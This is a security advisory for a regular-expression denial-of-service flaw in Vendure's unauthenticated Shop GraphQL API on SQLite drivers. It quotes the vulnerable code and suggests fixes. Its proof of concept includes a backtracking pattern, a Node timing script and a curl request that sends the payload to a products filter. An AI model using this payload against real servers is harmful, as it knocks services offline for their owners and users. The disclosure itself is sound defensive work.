[!IMPORTANT] Only instances running on the SQLite driver (better-sqlite3) are affected; SQLite is usually used in development/testing backend, so production deployments on PostgreSQL or MySQL/MariaDB are unaffected.
The StringOperators.regex filter exposed on the public Shop GraphQL API is evaluated inside the Node.js event loop via a synchronous SQLite user-defined function (UDF). Supplying a catastrophically backtracking pattern blocks the entire event loop, causing a complete denial of service with no authentication required.
Vendure registers a JavaScript UDF so that SQLite can handle the REGEXP operator:
packages/core/src/service/helpers/list-query-builder/list-query-builder.ts lines 917–931
private registerSQLiteRegexpFunction() {
const regexpFn = (pattern: string, value: string) => {
const result = new RegExp(`${pattern}`, 'i').test(value); // user-controlled pattern
return result ? 1 : 0;
};
if (dbType === 'better-sqlite3') {
driver.databaseConnection.function('regexp', regexpFn);
}
if (dbType === 'sqljs') {
driver.databaseConnection.create_function('regexp', regexpFn);
}
}
The pattern argument is the raw value of StringOperators.regex submitted by the caller. No length limit, timeout, or safe-regex validation is applied before constructing new RegExp(pattern).
packages/core/src/service/helpers/list-query-builder/parse-filter-params.ts lines 321–325
case 'regex':
return {
clause: getRegexpClause(fieldName, argIndex, dbType),
parameters: { [`arg${argIndex}`]: operand }, // operand = raw user input
};
The products resolver in packages/core/src/api/resolvers/shop/shop-products.resolver.ts carries no @Allow decorator, and the access control strategy treats an empty permission set as publicly accessible:
packages/core/src/config/auth/default-entity-access-control-strategy.ts lines 49–52
async canAccess(ctx: RequestContext, permissions: Permission[]): Promise<boolean> {
if (permissions.length === 0) {
return true; // no @Allow → public
}
...
}
The three conditions together — user-controlled regex, synchronous JS UDF on the event loop, unauthenticated access — create a complete unauthenticated DoS path.
Affected database drivers: better-sqlite3, sqljs.
MySQL/MariaDB and PostgreSQL delegate the pattern to the database engine (those engines have their own exposure characteristics but do not block the Node.js event loop).
Prerequisites: Node.js ≥ 18. No account, no server, no dependencies.
Step 1 — save the following as poc-redos.js:
// Exact code from list-query-builder.ts:918-919
const PATTERN = '(a+)+$';
const VALUE = 'a'.repeat(28) + 'b';
console.log('[*] pattern:', PATTERN, ' value:', VALUE);
console.log('[*] Starting (server would be unresponsive from this point)...');
const start = Date.now();
const result = new RegExp(`${PATTERN}`, 'i').test(VALUE);
console.log('[+] elapsed:', Date.now() - start, 'ms result:', result);
Step 2 — run it:
node poc-redos.js
Expected output (verified on Node.js v24.14.0):
[*] pattern: (a+)+$ value: aaaaaaaaaaaaaaaaaaaaaaaaaaaab
[*] Starting (server would be unresponsive from this point)...
[+] elapsed: 19755 ms result: false
A 29-character input causes ~20 seconds of CPU spin. Inside a live Vendure server this same code runs synchronously in the SQLite UDF on the Node.js event loop — the process cannot handle any other request for the entire duration.
Step 3 — GraphQL payload (against a running Vendure instance with better-sqlite3 or sqljs driver):
curl -s -X POST http://localhost:3000/shop-api -H "Content-Type: application/json" -d "{\"query\":\"{ products(options:{filter:{name:{regex:\\\"(a+)+$\\\"}}}) { items { id } } }\"}" --max-time 60
No test account is needed. The products query is publicly accessible.
Vulnerability type: Regular Expression Denial of Service (ReDoS)
Who is impacted:
better-sqlite3 or sqljs database driver (typical for development environments and single-server small deployments created via @vendure/create).Validate the regex before constructing it. Reject patterns that are known to cause catastrophic backtracking using a safe-regex library (e.g. safe-regex2 or recheck) before passing them to new RegExp().
Enforce a maximum pattern length. Reject StringOperators.regex values exceeding a reasonable limit (e.g. 100 characters) at the GraphQL validation layer.
Run the UDF in a worker thread. Move regexpFn off the main event loop by executing it in a worker_threads context with an AbortSignal timeout so a hung regex cannot block the server.
Require authentication for filtered list queries. Add @Allow(Permission.Authenticated) to ShopProductsResolver.products (and other filterable list queries) if anonymous product browsing is not a business requirement, as a defence-in-depth measure.
{
"cwe_ids": [
"CWE-1333"
],
"github_reviewed": true,
"github_reviewed_at": "2026-09-17T14:49:56Z",
"nvd_published_at": null,
"severity": "HIGH"
}